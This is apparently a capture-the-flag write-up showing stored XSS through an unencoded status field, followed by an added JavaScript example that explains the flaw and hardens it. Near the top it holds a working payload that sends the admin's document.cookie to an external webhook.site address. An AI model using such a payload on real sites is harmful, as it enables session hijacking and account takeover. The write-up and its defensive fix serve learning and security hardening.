Steal the administrator session’s cookie and go in the admin section.
We use this script to check whether XSS exists: <script>alert(1)</script>

OK, it encodes the content of the message field.

So let's look at the source code to see if we can bypass this.
I don't think I can do this on the message field, but I found something interesting:
it sends the status. So let's take advantage of this and inject our payload into it.

First, we will capture the request with Burp so we can manipulate it.

We will use this payload:
<script>document.location='https://webhook.site/0d8fd947-e1b8-41d1-bd48-68e0b672a0f0?cookie='+document.cookie</script>
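Why this works and how to close it, as an added example that is not part of the original writeup or the challenge's code: the message is encoded but the client-sent status is written into the page as-is. The function names, the status allowlist values, the markup and the cookie name are assumptions made for illustration.

```javascript
// Added example (assumed names and markup): the status comes from the client,
// exactly like the message, so it needs the same output encoding.
const ALLOWED_STATUS = new Set(["invite", "admin"]); // assumed allowlist values

function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Before: only the message is encoded; the status is concatenated raw.
function renderPostWeak(post) {
  return `<div class="${post.status}">` +
    `<i>status : ${post.status}</i>` +
    `<p>${escapeHtml(post.message)}</p></div>`;
}

// After: the status is checked against an allowlist, then encoded like any
// other untrusted field before it reaches the HTML.
function renderPostHardened(post) {
  const status = ALLOWED_STATUS.has(post.status) ? post.status : "invite";
  return `<div class="${escapeHtml(status)}">` +
    `<i>status : ${escapeHtml(status)}</i>` +
    `<p>${escapeHtml(post.message)}</p></div>`;
}

// Defense in depth: HttpOnly keeps the session value out of document.cookie,
// so script running in the page cannot read it.
function sessionCookieHeader(token) {
  return `session=${encodeURIComponent(token)}; HttpOnly; Secure; SameSite=Strict; Path=/`;
}

// Constructed sample: the same probe from the writeup in both fields.
const sample = {
  status: "<script>alert(1)</script>",
  message: "<script>alert(1)</script>",
};

console.log("weak:    ", renderPostWeak(sample));
console.log("hardened:", renderPostHardened(sample));
console.log("cookie:  ", sessionCookieHeader("constructed-token"));
```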